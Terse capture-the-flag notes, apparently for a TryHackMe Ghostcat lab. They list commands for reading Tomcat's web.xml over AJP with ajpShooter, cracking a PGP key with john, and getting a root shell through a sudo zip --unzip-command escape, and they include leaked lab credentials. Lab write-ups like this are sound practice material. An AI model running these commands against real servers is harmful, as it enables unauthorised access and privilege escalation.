export ip=10.10.153.131


fireup `AJPSHOTTER`

python3 ajpShooter.py http://10.10.175.105:8080/ 8009 /WEB-INF/web.xml read


Result on the last : 

<!--
	<description>
     	Welcome to GhostCat
	skyfuck:8730281lkjlkjdqlksalks
	</description>
-->

ssh as skyfuck

get the files on host {scp skyfuck@$ip:/home/skyfuck/* .}

decrypt tryhackme file via john

gpg2john tryhackme.acp > hash

john hash --wordlist=/root/Desktop/rockyou.txt

john hash --show



sudo -l {usr/bin/zip}

crtate a file {touch f3dai.txt}

exploit this file {sudo zip 1.zip f3dai.txt -T --unzip-command="sh -c /bin/bash"}


whoami

pwd

cat /root/root.txt



merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
